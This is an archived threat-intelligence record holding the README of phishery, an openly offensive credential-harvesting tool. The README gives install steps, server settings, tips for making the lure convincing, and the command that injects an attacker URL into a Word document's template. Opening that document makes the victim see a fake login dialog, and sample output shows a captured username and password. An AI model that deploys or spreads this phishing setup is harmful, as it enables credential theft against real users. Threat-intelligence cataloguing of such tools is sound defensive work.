{
	"id": "63bae602-d660-49a1-817a-e08dc8d512ea",
	"created_at": "2026-04-06T00:08:13.857082Z",
	"updated_at": "2026-04-10T13:12:12.128512Z",
	"deleted_at": null,
	"sha1_hash": "55b261823986895a6a61a72308d2c584a71051dd",
	"title": "GitHub - ryhanson/phishery: An SSL Enabled Basic Auth Credential Harvester with a Word Document Template URL Injector",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 129482,
	"plain_text": "GitHub - ryhanson/phishery: An SSL Enabled Basic Auth\r\nCredential Harvester with a Word Document Template URL\r\nInjector\r\nBy ryhanson\r\nArchived: 2026-04-05 13:45:05 UTC\r\nPhishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic\r\nAuthentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.\r\nThe power of phishery is best demonstrated by setting a Word document's template to a phishery URL. This\r\ncauses Microsoft Word to make a request to the URL, resulting in an Authentication Dialog being shown to the\r\nend-user. The ability to inject any .docx file with a URL is possible using phishery's -i [in docx] , -o [out\r\ndocx] , and -u [url] options.\r\nDownload\r\nOperating system specific packages can be downloaded from here.\r\nInstall\r\nExtract the archive, and optionally, install binary to $PATH\r\nhttps://github.com/ryhanson/phishery\r\nPage 1 of 4\n\n$ tar -xzvf phishery*.tar.gz\r\n$ cd phishery*\r\n$ cp phishery /usr/local/bin\r\nUsage\r\n$ phishery --help\r\n|\\ \\\\\\\\__ O __ _ __\r\n| \\_/ o \\ o ____ / /_ (_)____/ /_ ___ _______ __\r\n\u003e _ (( \u003c_ oO / __ \\/ __ \\/ / ___/ __ \\/ _ \\/ ___/ / / /\r\n| / \\__+___/ / /_/ / / / / (__ ) / / / __/ / / /_/ /\r\n|/ |/ / .___/_/ /_/_/____/_/ /_/\\___/_/ \\__, /\r\n /_/ Basic Auth Credential Harvester (____/\r\n with Word Doc Template Injector\r\n Start the server : phishery -s settings.json -c credentials.json\r\n Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx\r\n Options:\r\n -h, --help Show usage and exit.\r\n -v Show version and exit.\r\n -s The JSON settings file used to setup the server. [default: \"settings.json\"]\r\n -c The JSON file to store harvested credentials. [default: \"credentials.json\"]\r\n -u The phishery URL to use as the Word document template.\r\n -i The Word .docx file to inject with a template URL.\r\n -o The new Word .docx file with the injected template URL.\r\nRunning the server\r\nModify the provided settings.json file as needed, by default it should look like this:\r\n{\r\n \"ip\": \"0.0.0.0\",\r\n \"port\": \"443\",\r\n \"sslCert\": \"server.crt\",\r\n \"sslKey\": \"server.key\",\r\n \"basicRealm\": \"Secure Document Gateway\",\r\n \"responseStatus\": 200,\r\n \"responseFile\": \"template.dotx\",\r\n \"responseHeaders\": [\r\n [\"Content-Type\", \"application/vnd.openxmlformats-officedocument.wordprocessingml.template\"]\r\n ]\r\n}\r\nhttps://github.com/ryhanson/phishery\r\nPage 2 of 4\n\nThis setup will start the HTTP server on Port 443 with SSL configured to use server.crt and server.key. The basic\r\nauthentication realm is set to Secure Document Gateway. When any credentials are provided, a 200 response\r\nstatus is sent along with the contents of the included template.dotx and the content type header: Content-Type:\r\napplication/vnd.openxmlformats-officedocument.wordprocessingml.template.\r\nThe settings file may also be configured to output a simple body, by using responseBody, like this:\r\n{\r\n \"ip\": \"0.0.0.0\",\r\n \"port\": \"443\",\r\n \"sslCert\": \"server.crt\",\r\n \"sslKey\": \"server.key\",\r\n \"basicRealm\": \"Secure Document Gateway\",\r\n \"responseStatus\": 404,\r\n \"responseBody\": \"\u003ch1\u003eNot Found\u003c/h1\u003e\",\r\n \"responseHeaders\": [\r\n [\"Content-Type\", \"text/html\"]\r\n ]\r\n}\r\nThe effectiveness of this tool is based mostly on the Domain and Basic Auth Realm used, as that is often all the\r\nend user will see when triggered from an Office document. Make sure to point your DNS A Records the public IP\r\nof the phishery server.\r\nIt's recommended that the provided cert is replaced with a trusted one, such as one generated with LetsEncrypt.\r\nMicrosoft Word on OS X will prevent the auth dialog if the cert is invalid, and Microsoft Word on Windows will\r\nprompt the user to accept the invalid certificate.\r\nOnce the server is configured and running, all you need to do is embed a phishery URL in a document, or\r\nanywhere else your heart desires. phishery does give you the ability to inject your URL into a Word document as a\r\ntemplate, instructions on how to do this can be found below.\r\nInjecting a Word Document\r\nTo inject a Word document with a template URL, you'll need a .docx file and the phishery server URL.\r\nNow run phishery with your document and URL:\r\n$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx\r\n[+] Opening Word document: good.docx\r\n[+] Setting Word document template to: https://secure.site.local/docs\r\n[+] Saving injected Word document to: bad.docx\r\n[*] Injected Word document has been saved!\r\nhttps://github.com/ryhanson/phishery\r\nPage 3 of 4\n\nMake sure your phishery server is running and available at the URL you used. Now when the Word document is\r\nopened, the victim will be prompted with an authentication dialog.\r\nNow when the victim opens the document, you'll see the following:\r\n$ ./phishery\r\n[+] Credential store initialized at: credentials.json\r\n[+] Starting HTTPS Auth Server on: 0.0.0.0:443\r\n[*] Request Received at 2016-09-25 01:06:28: HEAD https://secure.site.local/docs\r\n[*] Sending Basic Auth response to: 127.0.0.1\r\n[*] New credentials harvested!\r\n[HTTP] Host : secure.example.local\r\n[HTTP] Request : /docs\r\n[HTTP] User Agent : Microsoft Office Word\r\n[HTTP] IP Address : 127.0.0.1\r\n[AUTH] Username : john.doe\r\n[AUTH] Password : Summer15\r\nSource: https://github.com/ryhanson/phishery\r\nhttps://github.com/ryhanson/phishery\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/ryhanson/phishery"
	],
	"report_names": [
		"phishery"
	],
	"threat_actors": [
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434093,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/55b261823986895a6a61a72308d2c584a71051dd.pdf",
		"text": "https://archive.orkl.eu/55b261823986895a6a61a72308d2c584a71051dd.txt",
		"img": "https://archive.orkl.eu/55b261823986895a6a61a72308d2c584a71051dd.jpg"
	}
}